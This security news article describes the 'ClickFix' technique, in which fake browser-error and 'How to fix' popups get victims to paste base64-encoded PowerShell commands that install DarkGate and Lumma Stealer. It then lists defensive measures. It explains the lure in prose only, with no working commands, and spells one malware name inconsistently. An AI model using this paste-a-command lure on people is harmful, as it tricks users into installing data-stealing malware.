Researchers have recently uncovered a new malware delivery method known as “ClickFix.” This technique exploits user trust by utilizing compromised websites to deliver two specific variants of malware, namely DakGate and Lumma Stealer. The ClickFix method leverages social engineering tactics to deceive users into executing malicious scripts, potentially leading to significant compromises in the affected systems.
The malicious scheme begins with these compromised websites redirecting unsuspecting visitors to domains hosting fake popup windows. These windows prompt users to paste a script into a PowerShell terminal, unknowingly initiating the malware delivery process.
Once users follow the instructions and paste the base64-encoded commands into the PowerShell terminal, the malware is downloaded and executed from remote attacker-controlled servers. This method allows the threat actors to gain access to the compromised systems and carry out malicious activities.
The ClickFix social engineering tactic represents a sophisticated and highly effective approach to deploying malware. Once the malware infiltrates a system, it employs various techniques to evade detection, maintain persistence, and steal sensitive data from users, which is then sent to a command and control (C2) server.
Researchers have delved into the specifics of how the DarkGate and Lumma Stealer malware leverage the ClickFix technique. DarkGate, for instance, is distributed through phishing emails containing HTML attachments disguised as MS Office Word documents. Upon accessing the attachment, users are prompted to click a “How to fix” button, revealing base64-encoded commands that hide malicious PowerShell instructions. Once initiated, DarkGate can download and execute additional malicious payloads, enabling data exfiltration and unauthorized remote access by threat actors.
Similarly, Lumma Stealer utilizes a similar method of infection through the ClickFix technique. Visitors to compromised websites encounter error messages claiming browser problems and are instructed to enter base64-encoded commands into a PowerShell terminal. This action triggers the execution of Lumma Stealer, bypassing traditional security measures and compromising the affected systems.
To counter the ClickFix technique and mitigate the risks posed by DarkGate and Lumma Stealer, researchers recommend several preventive measures:
– Conduct regular training to educate individuals about social engineering tactics and phishing campaigns.
– Utilize antivirus software on system endpoints.
– Implement robust email and website filtering systems to block malicious content.
– Deploy firewalls and intrusion detection/prevention systems to monitor and block malicious traffic.
– Segment networks to prevent malware spread.
– Monitor network logs and traffic for suspicious activity.
– Enforce the principle of least privilege.
– Implement security policies to monitor clipboard content.
– Enable multi-factor authentication.
– Keep operating systems and software up to date with security patches.
– Encrypt stored data to prevent unauthorized access.
– Perform regular and secure backups of critical data.
By following these recommendations and staying vigilant against social engineering tactics, organizations can enhance their cybersecurity posture and minimize the risk of falling victim to malware attacks like DarkGate and Lumma Stealer.